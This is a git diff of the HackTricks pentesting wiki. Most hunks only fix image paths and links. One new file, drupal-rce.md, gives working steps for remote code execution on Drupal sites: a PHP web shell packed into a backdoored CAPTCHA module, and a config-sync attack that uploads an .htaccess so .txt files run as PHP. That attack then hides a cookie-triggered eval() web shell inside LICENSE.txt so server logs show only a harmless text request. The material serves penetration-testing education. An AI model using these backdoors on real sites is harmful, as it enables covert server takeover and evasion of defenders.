+<figure><img src="../../.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure>
 
 **Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun.
 
@@ -134,7 +134,7 @@ guest    guest
 * [Burp Extension - 403 Bypasser](https://portswigger.net/bappstore/444407b96d9c4de0adb7aed89e826122)
 * [Forbidden Buster](https://github.com/Sn1r/Forbidden-Buster)
 
-<figure><img src="../../.gitbook/assets/image (14).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure>
 
 **Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun.
 
diff --git a/network-services-pentesting/pentesting-web/README.md b/network-services-pentesting/pentesting-web/README.md
index b83a7f970..88d19dda7 100644
--- a/network-services-pentesting/pentesting-web/README.md
+++ b/network-services-pentesting/pentesting-web/README.md
@@ -14,7 +14,7 @@ Other ways to support HackTricks:
 
 </details>
 
-<figure><img src="../../.gitbook/assets/image (1) (1).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
 
 If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
 
@@ -93,7 +93,7 @@ Some **tricks** for **finding vulnerabilities** in different well known **techno
 * [**Artifactory**](artifactory-hacking-guide.md)
 * [**Buckets**](buckets/)
 * [**CGI**](cgi.md)
-* [**Drupal**](drupal.md)
+* [**Drupal**](drupal/)
 * [**Flask**](flask.md)
 * [**Git**](git.md)
 * [**Golang**](golang.md)
@@ -159,10 +159,10 @@ node puff.js -w ./wordlist-examples/xss.txt -u "http://www.xssgame.com/f/m4KKGHi
 If a CMS is used don't forget to **run a scanner**, maybe something juicy is found:
 
 [**Clusterd**](https://github.com/hatRiot/clusterd)**:** [**JBoss**](jboss.md)**, ColdFusion, WebLogic,** [**Tomcat**](tomcat/)**, Railo, Axis2, Glassfish**\
-[**CMSScan**](https://github.com/ajinabraham/CMSScan): [**WordPress**](wordpress.md), [**Drupal**](drupal.md), **Joomla**, **vBulletin** websites for Security issues. (GUI)\
-[**VulnX**](https://github.com/anouarbensaad/vulnx)**:** [**Joomla**](joomla.md)**,** [**Wordpress**](wordpress.md)**,** [**Drupal**](drupal.md)**, PrestaShop, Opencart**\
-**CMSMap**: [**(W)ordpress**](wordpress.md)**,** [**(J)oomla**](joomla.md)**,** [**(D)rupal**](drupal.md) **or** [**(M)oodle**](moodle.md)\
-[**droopscan**](https://github.com/droope/droopescan)**:** [**Drupal**](drupal.md)**,** [**Joomla**](joomla.md)**,** [**Moodle**](moodle.md)**, Silverstripe,** [**Wordpress**](wordpress.md)
+[**CMSScan**](https://github.com/ajinabraham/CMSScan): [**WordPress**](wordpress.md), [**Drupal**](drupal/), **Joomla**, **vBulletin** websites for Security issues. (GUI)\
+[**VulnX**](https://github.com/anouarbensaad/vulnx)**:** [**Joomla**](joomla.md)**,** [**Wordpress**](wordpress.md)**,** [**Drupal**](drupal/)**, PrestaShop, Opencart**\
+**CMSMap**: [**(W)ordpress**](wordpress.md)**,** [**(J)oomla**](joomla.md)**,** [**(D)rupal**](drupal/) **or** [**(M)oodle**](moodle.md)\
+[**droopscan**](https://github.com/droope/droopescan)**:** [**Drupal**](drupal/)**,** [**Joomla**](joomla.md)**,** [**Moodle**](moodle.md)**, Silverstripe,** [**Wordpress**](wordpress.md)
 
 ```bash
 cmsmap [-f W] -F -d <URL>
@@ -365,7 +365,7 @@ Find more info about web vulns in:
 
 You can use tools such as [https://github.com/dgtlmoon/changedetection.io](https://github.com/dgtlmoon/changedetection.io) to monitor pages for modifications that might insert vulnerabilities.
 
-<figure><img src="../../.gitbook/assets/image (1) (1).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
 
 If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
 
diff --git a/network-services-pentesting/pentesting-web/drupal.md b/network-services-pentesting/pentesting-web/drupal/README.md
similarity index 59%
rename from network-services-pentesting/pentesting-web/drupal.md
rename to network-services-pentesting/pentesting-web/drupal/README.md
index 6ff48bb80..e22078b5f 100644
--- a/network-services-pentesting/pentesting-web/drupal.md
+++ b/network-services-pentesting/pentesting-web/drupal/README.md
@@ -60,25 +60,25 @@ Newer installs of Drupal by default block access to the `CHANGELOG.txt` and `REA
 
 In _/user/register_ just try to create a username and if the name is already taken it will be notified:
 
-![](<../../.gitbook/assets/image (328).png>)
+![](<../../../.gitbook/assets/image (328).png>)
 
 #### Request new password
 
 If you request a new password for an existing username:
 
-![](<../../.gitbook/assets/image (903).png>)
+![](<../../../.gitbook/assets/image (903).png>)
 
 If you request a new password for a non-existent username:
 
-![](<../../.gitbook/assets/image (307).png>)
+![](<../../../.gitbook/assets/image (307).png>)
 
 ### Get number of users
 
 Accessing _/user/\<number>_ you can see the number of existing users, in this case is 2 as _/users/3_ returns a not found error:
 
-![](<../../.gitbook/assets/image (333).png>)
+![](<../../../.gitbook/assets/image (333).png>)
 
-![](<../../.gitbook/assets/image (227) (1) (1) (1).png>)
+![](<../../../.gitbook/assets/image (227) (1) (1) (1).png>)
 
 ### Hidden pages
 
@@ -105,75 +105,11 @@ droopescan scan drupal -u http://drupal-site.local
 
 ## RCE
 
-### With PHP Filter Module
+If you have access to the Drupal web console check these options to get RCE:
 
-{% hint style="warning" %}
-In older versions of Drupal **(before version 8)**, it was possible to log in as an admin and **enable the `PHP filter` module**, which "Allows embedded PHP code/snippets to be evaluated."
-{% endhint %}
-
-You need the **plugin php to be installed** (check it accessing to _/modules/php_ and if it returns a **403** then, **exists**, if **not found**, then the **plugin php isn't installed**)
-
-Go to _Modules_ -> (**Check**) _PHP Filter_ -> _Save configuration_
-
-![](<../../.gitbook/assets/image (247) (1).png>)
-
-Then click on _Add content_ -> Select _Basic Page_ or _Article -_> Write _php shellcode on the body_ -> Select _PHP code_ in _Text format_ -> Select _Preview_
-
-![](<../../.gitbook/assets/image (338).png>)
-
-Finally just access the newly created node:
-
-```bash
-curl http://drupal-site.local/node/3
-```
-
-### Install PHP Filter Module
-
-From version **8 onwards, the** [**PHP Filter**](https://www.drupal.org/project/php/releases/8.x-1.1) **module is not installed by default**. To leverage this functionality, we would have to **install the module ourselves**.
-
-1. Download the most recent version of the module from the Drupal website.
-   1. wget https://ftp.drupal.org/files/projects/php-8.x-1.1.tar.gz
-2. Once downloaded go to **`Administration`** > **`Reports`** > **`Available updates`**.
-3. Click on **`Browse`**`,` select the file from the directory we downloaded it to, and then click **`Install`**.
-4. Once the module is installed, we can click on **`Content`** and **create a new basic page**, similar to how we did in the Drupal 7 example. Again, be sure to **select `PHP code` from the `Text format` dropdown**.
-
-### Backdoored Module
-
-A backdoored module can be created by **adding a shell to an existing module**. Modules can be found on the drupal.org website. Let's pick a module such as [CAPTCHA](https://www.drupal.org/project/captcha). Scroll down and copy the link for the tar.gz [archive](https://ftp.drupal.org/files/projects/captcha-8.x-1.2.tar.gz).
-
-* Download the archive and extract its contents.
-
-```
-wget --no-check-certificate  https://ftp.drupal.org/files/projects/captcha-8.x-1.2.tar.gz
-tar xvf captcha-8.x-1.2.tar.gz
-```
-
-* Create a **PHP web shell** with the contents:
-
-```php
-<?php
-system($_GET["cmd"]);
-?>
-```
-
-* Next, we need to create a **`.htaccess`** file to give ourselves access to the folder. This is necessary as Drupal denies direct access to the **`/modules`** folder.
-
-```html
-<IfModule mod_rewrite.c>
-RewriteEngine On
-RewriteBase /
-</IfModule>
-```
-
-* The configuration above will apply rules for the / folder when we request a file in /modules. Copy both of these files to the captcha folder and create an archive.
-
-```bash
-mv shell.php .htaccess captcha
-tar cvf captcha.tar.gz captcha/
-```
-
-* Assuming we have **administrative access** to the website, click on **`Manage`** and then **`Extend`** on the sidebar. Next, click on the **`+ Install new module`** button, and we will be taken to the install page, such as `http://drupal-site.local/admin/modules/install` Browse to the backdoored Captcha archive and click **`Install`**.
-* Once the installation succeeds, browse to **`/modules/captcha/shell.php`** to execute commands.
+{% content-ref url="drupal-rce.md" %}
+[drupal-rce.md](drupal-rce.md)
+{% endcontent-ref %}
 
 ## Post Exploitation
 
diff --git a/network-services-pentesting/pentesting-web/drupal/drupal-rce.md b/network-services-pentesting/pentesting-web/drupal/drupal-rce.md
new file mode 100644
index 000000000..81e73d604
--- /dev/null
+++ b/network-services-pentesting/pentesting-web/drupal/drupal-rce.md
@@ -0,0 +1,305 @@
+# Drupal RCE
+
+<details>
+
+<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
+
+Other ways to support HackTricks:
+
+* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
+* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+
+## With PHP Filter Module
+
+{% hint style="warning" %}
+In older versions of Drupal **(before version 8)**, it was possible to log in as an admin and **enable the `PHP filter` module**, which "Allows embedded PHP code/snippets to be evaluated." But from version 8 this module is not installed by default.
+{% endhint %}
+
+You need the **plugin php to be installed** (check it accessing to _/modules/php_ and if it returns a **403** then, **exists**, if **not found**, then the **plugin php isn't installed**)
+
+Go to _Modules_ -> (**Check**) _PHP Filter_ -> _Save configuration_
+
+![](<../../../.gitbook/assets/image (247) (1).png>)
+
+Then click on _Add content_ -> Select _Basic Page_ or _Article -_> Write _php shellcode on the body_ -> Select _PHP code_ in _Text format_ -> Select _Preview_
+
+![](<../../../.gitbook/assets/image (338).png>)
+
+Finally just access the newly created node:
+
+```bash
+curl http://drupal-site.local/node/3
+```
+
+## Install PHP Filter Module
+
+{% hint style="warning" %}
+In current versions i't no longer possible to install plugins by only having access to the web after the default installation.
+{% endhint %}
+
+From version **8 onwards, the** [**PHP Filter**](https://www.drupal.org/project/php/releases/8.x-1.1) **module is not installed by default**. To leverage this functionality, we would have to **install the module ourselves**.
+
+1. Download the most recent version of the module from the Drupal website.
+   1. wget https://ftp.drupal.org/files/projects/php-8.x-1.1.tar.gz
+2. Once downloaded go to **`Administration`** > **`Reports`** > **`Available updates`**.
+3. Click on **`Browse`**`,` select the file from the directory we downloaded it to, and then click **`Install`**.
+4. Once the module is installed, we can click on **`Content`** and **create a new basic page**, similar to how we did in the Drupal 7 example. Again, be sure to **select `PHP code` from the `Text format` dropdown**.
+
+## Backdoored Module
+
+{% hint style="warning" %}
+In current versions it's no longer possible to install plugins by only having access to the web after the default installation.
+{% endhint %}
+
+A backdoored module can be created by **adding a shell to an existing module**. Modules can be found on the drupal.org website. Let's pick a module such as [CAPTCHA](https://www.drupal.org/project/captcha). Scroll down and copy the link for the tar.gz [archive](https://ftp.drupal.org/files/projects/captcha-8.x-1.2.tar.gz).
+
+* Download the archive and extract its contents.
+
+```
+wget --no-check-certificate  https://ftp.drupal.org/files/projects/captcha-8.x-1.2.tar.gz
+tar xvf captcha-8.x-1.2.tar.gz
+```
+
+* Create a **PHP web shell** with the contents:
+
+```php
+<?php
+system($_GET["cmd"]);
+?>
+```
+
+* Next, we need to create a **`.htaccess`** file to give ourselves access to the folder. This is necessary as Drupal denies direct access to the **`/modules`** folder.
+
+```html
+<IfModule mod_rewrite.c>
+RewriteEngine On
+RewriteBase /
+</IfModule>
+```
+
+* The configuration above will apply rules for the / folder when we request a file in /modules. Copy both of these files to the captcha folder and create an archive.
+
+```bash
+mv shell.php .htaccess captcha
+tar cvf captcha.tar.gz captcha/
+```
+
+* Assuming we have **administrative access** to the website, click on **`Manage`** and then **`Extend`** on the sidebar. Next, click on the **`+ Install new module`** button, and we will be taken to the install page, such as `http://drupal-site.local/admin/modules/install` Browse to the backdoored Captcha archive and click **`Install`**.
+* Once the installation succeeds, browse to **`/modules/captcha/shell.php`** to execute commands.
+
+## Backdooring Drupal with Configuration synchronization <a href="#backdooring-drupal" id="backdooring-drupal"></a>
+
+**Post shared by** [**Coiffeur0x90**](https://twitter.com/Coiffeur0x90)
+
+### Part 1 (activation of _Media_ and _Media Library_)
+
+In the _Extend_ menu (/admin/modules), you can activate what appear to be plugins already installed. By default, plugins _Media_ and _Media Library_ don’t appear to be activated, so let’s activate them.
+
+Before activation:
+
+<figure><img src="../../../.gitbook/assets/image.png" alt=""><figcaption></figcaption></figure>
+
+After activation:
+
+<figure><img src="../../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
+
+<figure><img src="../../../.gitbook/assets/image (2).png" alt=""><figcaption></figcaption></figure>
+
+### Part 2 (leveraging feature _Configuration synchronization_) <a href="#part-2-leveraging-feature-configuration-synchronization" id="part-2-leveraging-feature-configuration-synchronization"></a>
+
+We’ll leverage the _Configuration synchronization_ feature to dump (export) and upload (import) Drupal configuration entries:
+
+* /admin/config/development/configuration/single/export
+* /admin/config/development/configuration/single/import
+
+**Patch system.file.yml**
+
+Let’s start by patching the first entry `allow_insecure_uploads` from:
+
+File: system.file.yml
+
+```
+
+...
+
+allow_insecure_uploads: false
+
+...
+
+```
+
+<figure><img src="../../../.gitbook/assets/image (3).png" alt=""><figcaption></figcaption></figure>
+
+To:
+
+File: system.file.yml
+
+```
+
+...
+
+allow_insecure_uploads: true
+
+...
+
+```
+
+<figure><img src="../../../.gitbook/assets/image (4).png" alt=""><figcaption></figcaption></figure>
+
+**Patch field.field.media.document.field\_media\_document.yml**
+
+Then, patch the second entry `file_extensions` from:
+
+File: field.field.media.document.field\_media\_document.yml
+
+```
+
+...
+
+  file_directory: '[date:custom:Y]-[date:custom:m]'
+  file_extensions: 'txt rtf doc docx ppt pptx xls xlsx pdf odf odg odp ods odt fodt fods fodp fodg key numbers pages'
+
+...
+```
+
+<figure><img src="../../../.gitbook/assets/image (5).png" alt=""><figcaption></figcaption></figure>
+
+To:
+
+File: field.field.media.document.field\_media\_document.yml
+
+```
+...
+
+  file_directory: '[date:custom:Y]-[date:custom:m]'
+  file_extensions: 'htaccess txt rtf doc docx ppt pptx xls xlsx pdf odf odg odp ods odt fodt fods fodp fodg key numbers pages'
+
+...
+
+```
+
+> I don’t use it in this blogpost but it is noted that it is possible to define the entry `file_directory` in an arbitrary way and that it is vulnerable to a path traversal attack (so we can go back up within the Drupal filesystem tree).
+
+<figure><img src="../../../.gitbook/assets/image (6).png" alt=""><figcaption></figcaption></figure>
+
+### Part 3 (leveraging feature _Add Document_) <a href="#part-3-leveraging-feature-add-document" id="part-3-leveraging-feature-add-document"></a>
+
+The last step is the simplest, and is broken down into two sub-steps. The first is to upload a file in .htaccess format to leverage the Apache directives and allow .txt files to be interpreted by the PHP engine. The second is to upload a .txt file containing our payload.
+
+File: .htaccess
+
+```
+<Files *>
+  SetHandler application/x-httpd-php
+</Files>
+
+# Vroum! Vroum!
+# We reactivate PHP engines for all versions in order to be targetless.
+<IfModule mod_php.c>
+  php_flag engine on
+</IfModule>
+<IfModule mod_php7.c>
+  php_flag engine on
+</IfModule>
+<IfModule mod_php5.c>
+  php_flag engine on
+</IfModule>
+```
+
+Why is this trick cool?
+
+Because once the Webshell (that we’ll call LICENSE.txt ) is dropped onto the Web server, we can transmit our commands via `$_COOKIE` and in the Web server logs, this will show up as a legitimate GET request to a text file.
+
+Why name our Webshell LICENSE.txt?
+
+Simply because if we take the following file, for example [core/LICENSE.txt](https://github.com/drupal/drupal/blob/11.x/core/LICENSE.txt) (which is already present in the Drupal core), we have a file of 339 lines and 17.6 KB in size, which is perfect for adding a small snippet of PHP code in the middle (since the file is big enough).
+
+<figure><img src="../../../.gitbook/assets/image (7).png" alt=""><figcaption></figcaption></figure>
+
+File: Patched LICENSE.txt
+
+```txt
+
+...
+
+this License, you may choose any version ever published by the Free Software
+Foundation.
+
+<?php
+
+# We inject our payload into the cookies so that in the logs of the compromised
+# server it shows up as having been requested via the GET method, in order to
+# avoid raising suspicions.
+if (isset($_COOKIE["89e127753a890d9c4099c872704a0711bbafbce9"])) {
+    if (!empty($_COOKIE["89e127753a890d9c4099c872704a0711bbafbce9"])) {
+        eval($_COOKIE["89e127753a890d9c4099c872704a0711bbafbce9"]);
+    } else {
+        phpinfo();
+    }
+}
+
+?>
+
+  10. If you wish to incorporate parts of the Program into other free
+programs whose distribution conditions are different, write to the author
+
+...
+
+```
+
+#### **Part 3.1 (upload file .htaccess)**
+
+First, we leverage the _Add Document_ (/media/add/document) feature to upload our file containing the Apache directives (.htaccess).
+
+<figure><img src="../../../.gitbook/assets/image (8).png" alt=""><figcaption></figcaption></figure>
+
+<figure><img src="../../../.gitbook/assets/image (9).png" alt=""><figcaption></figcaption></figure>
+
+<figure><img src="../../../.gitbook/assets/image (10).png" alt=""><figcaption></figcaption></figure>
+
+**Part 3.2 (upload file LICENSE.txt)**
+
+Then, we leverage the _Add Document_ (/media/add/document) feature again to upload a Webshell hidden within a license file.
+
+<figure><img src="../../../.gitbook/assets/image (11).png" alt=""><figcaption></figcaption></figure>
+
+<figure><img src="../../../.gitbook/assets/image (12).png" alt=""><figcaption></figcaption></figure>
+
+<figure><img src="../../../.gitbook/assets/image (13).png" alt=""><figcaption></figcaption></figure>
+
+### Part 4 (interaction with the Webshell) <a href="#part-4-interaction-with-the-webshell" id="part-4-interaction-with-the-webshell"></a>
+
+The last part consists of interacting with the Webshell.
+
+As shown in the following screenshot, if the cookie expected by our Webshell is not defined, we get the subsequent result when consulting the file via a Web browser.
+
+<figure><img src="../../../.gitbook/assets/image (14).png" alt=""><figcaption></figcaption></figure>
+
+When the attacker sets the cookie, he can interact with the Webshell and execute any commands he wants.
+
+<figure><img src="../../../.gitbook/assets/image (15).png" alt=""><figcaption></figcaption></figure>
+
+And as you can see in the logs, it looks like only a txt file has been requested.
+
+<figure><img src="../../../.gitbook/assets/image (16).png" alt=""><figcaption></figcaption></figure>
+
+Thank you for taking the time to read this article, I hope it will help you get some shells.
+
+<details>
+
+<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
+
+Other ways to support HackTricks:
+
+* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
+* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
diff --git a/network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-ipc.md b/network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-ipc.md
index 603f0c114..bd72874f1 100644
--- a/network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-ipc.md
+++ b/network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-ipc.md
@@ -22,7 +22,7 @@ If the preload script exposes an IPC endpoint from the main.js file, the rendere
 
 Example from [https://speakerdeck.com/masatokinugawa/how-i-hacked-microsoft-teams-and-got-150000-dollars-in-pwn2own?slide=21](https://speakerdeck.com/masatokinugawa/how-i-hacked-microsoft-teams-and-got-150000-dollars-in-pwn2own?slide=21) (you have the full example of how MS Teams was abusing from XSS to RCE in those slides, this is just a very basic example):
 
-<figure><img src="../../../.gitbook/assets/image (9).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../../.gitbook/assets/image (9) (1).png" alt=""><figcaption></figcaption></figure>
 
 ## Example 1
 
diff --git a/network-services-pentesting/pentesting-web/jira.md b/network-services-pentesting/pentesting-web/jira.md
index 60b79b2b5..87e1de4ca 100644
--- a/network-services-pentesting/pentesting-web/jira.md
+++ b/network-services-pentesting/pentesting-web/jira.md
@@ -14,7 +14,7 @@ Other ways to support HackTricks:
 
 </details>
 
-<figure><img src="../../.gitbook/assets/image (1) (1).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
 
 If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
 
@@ -80,7 +80,7 @@ curl https://jira.some.example.com/rest/api/2/mypermissions | jq | grep -iB6 '"h
 * [https://github.com/0x48piraj/Jiraffe](https://github.com/0x48piraj/Jiraffe)
 * [https://github.com/bcoles/jira\_scan](https://github.com/bcoles/jira\_scan)
 
-<figure><img src="../../.gitbook/assets/image (1) (1).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
 
 If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
 
diff --git a/network-services-pentesting/pentesting-web/nginx.md b/network-services-pentesting/pentesting-web/nginx.md
index cfb893dc1..0966bd4ee 100644
--- a/network-services-pentesting/pentesting-web/nginx.md
+++ b/network-services-pentesting/pentesting-web/nginx.md
@@ -14,7 +14,7 @@ Other ways to support HackTricks:
 
 </details>
 
-<figure><img src="../../.gitbook/assets/image (14).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure>
 
 **Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun.
 
@@ -315,7 +315,7 @@ Nginxpwner is a simple tool to look for common Nginx misconfigurations and vulne
 * [**http://blog.zorinaq.com/nginx-resolver-vulns/**](http://blog.zorinaq.com/nginx-resolver-vulns/)
 * [**https://github.com/yandex/gixy/issues/115**](https://github.com/yandex/gixy/issues/115)
 
-<figure><img src="../../.gitbook/assets/image (14).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure>
 
 **Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun.
 
diff --git a/network-services-pentesting/pentesting-web/werkzeug.md b/network-services-pentesting/pentesting-web/werkzeug.md
index a97bc1bc2..5162244ed 100644
--- a/network-services-pentesting/pentesting-web/werkzeug.md
+++ b/network-services-pentesting/pentesting-web/werkzeug.md
@@ -14,7 +14,7 @@ Other ways to support HackTricks:
 
 </details>
 
-<figure><img src="../../.gitbook/assets/image (14).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure>
 
 **Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun.
 
@@ -183,7 +183,7 @@ This is because, In Werkzeug it's possible to send some **Unicode** characters a
 * [**https://github.com/pallets/werkzeug/issues/2833**](https://github.com/pallets/werkzeug/issues/2833)
 * [**https://mizu.re/post/twisty-python**](https://mizu.re/post/twisty-python)
 
-<figure><img src="../../.gitbook/assets/image (14).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure>
 
 **Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun.
 
diff --git a/pentesting-web/browser-extension-pentesting-methodology/README.md b/pentesting-web/browser-extension-pentesting-methodology/README.md
index 1e89f4d80..d806f372b 100644
--- a/pentesting-web/browser-extension-pentesting-methodology/README.md
+++ b/pentesting-web/browser-extension-pentesting-methodology/README.md
@@ -22,7 +22,7 @@ Browser extensions are written in JavaScript and loaded by the browser in the ba
 
 Extension layouts look best when visualised and consists of three components. Let’s look at each component in depth.
 
-<figure><img src="../../.gitbook/assets/image (16).png" alt=""><figcaption><p><a href="http://webblaze.cs.berkeley.edu/papers/Extensions.pdf">http://webblaze.cs.berkeley.edu/papers/Extensions.pdf</a></p></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (16) (1).png" alt=""><figcaption><p><a href="http://webblaze.cs.berkeley.edu/papers/Extensions.pdf">http://webblaze.cs.berkeley.edu/papers/Extensions.pdf</a></p></figcaption></figure>
 
 ### **Content Scripts**
 
diff --git a/pentesting-web/csrf-cross-site-request-forgery.md b/pentesting-web/csrf-cross-site-request-forgery.md
index 6faeb47c1..b38c8a596 100644
--- a/pentesting-web/csrf-cross-site-request-forgery.md
+++ b/pentesting-web/csrf-cross-site-request-forgery.md
@@ -45,7 +45,7 @@ To exploit a CSRF vulnerability, several conditions must be met:
 
 You could **capture the request in Burp** and check CSRF protections and to test from the bowser you can click on **Copy as fetch** and check the request:
 
-<figure><img src="../.gitbook/assets/image (11).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (11) (1).png" alt=""><figcaption></figcaption></figure>
 
 ### Defending Against CSRF
 
diff --git a/pentesting-web/file-upload/README.md b/pentesting-web/file-upload/README.md
index ce64766b6..a07427f08 100644
--- a/pentesting-web/file-upload/README.md
+++ b/pentesting-web/file-upload/README.md
@@ -14,7 +14,7 @@ Other ways to support HackTricks:
 
 </details>
 
-<figure><img src="../../.gitbook/assets/image (1) (1).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
 
 If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
 
@@ -340,7 +340,7 @@ More information in: [https://medium.com/swlh/polyglot-files-a-hackers-best-frie
 * [https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/](https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/)
 * [https://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a](https://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a)
 
-<figure><img src="../../.gitbook/assets/image (1) (1).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
 
 If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
 
diff --git a/pentesting-web/hacking-jwt-json-web-tokens.md b/pentesting-web/hacking-jwt-json-web-tokens.md
index 4d7346a05..a8206fda3 100644
--- a/pentesting-web/hacking-jwt-json-web-tokens.md
+++ b/pentesting-web/hacking-jwt-json-web-tokens.md
@@ -14,7 +14,7 @@ Other ways to support HackTricks:
 
 </details>
 
-<figure><img src="../.gitbook/assets/image (1) (1).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
 
 If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
 
@@ -279,7 +279,7 @@ The token's expiry is checked using the "exp" Payload claim. Given that JWTs are
 
 {% embed url="https://github.com/ticarpi/jwt_tool" %}
 
-<figure><img src="../.gitbook/assets/image (1) (1).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
 
 If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
 
diff --git a/pentesting-web/hacking-with-cookies/README.md b/pentesting-web/hacking-with-cookies/README.md
index bb057e489..bd5be4640 100644
--- a/pentesting-web/hacking-with-cookies/README.md
+++ b/pentesting-web/hacking-with-cookies/README.md
@@ -111,11 +111,11 @@ It is important to note that cookies prefixed with `__Host-` are not allowed to
 
 So, one of the protection of `__Host-` prefixed cookies is to prevent them from being overwritten from subdomains. Preventing for example [**Cookie Tossing attacks**](cookie-tossing.md). In the talk [**Cookie Crumbles: Unveiling Web Session Integrity Vulnerabilities**](https://www.youtube.com/watch?v=F\_wAzF4a7Xg) ([**paper**](https://www.usenix.org/system/files/usenixsecurity23-squarcina.pdf)) it's presented that it was possible to set \_\_HOST- prefixed cookies from subdomain, by tricking the parser, for example, adding "=" at the beggining or at the beginig and the end...:
 
-<figure><img src="../../.gitbook/assets/image (6).png" alt=""><figcaption></figcaption></figure>
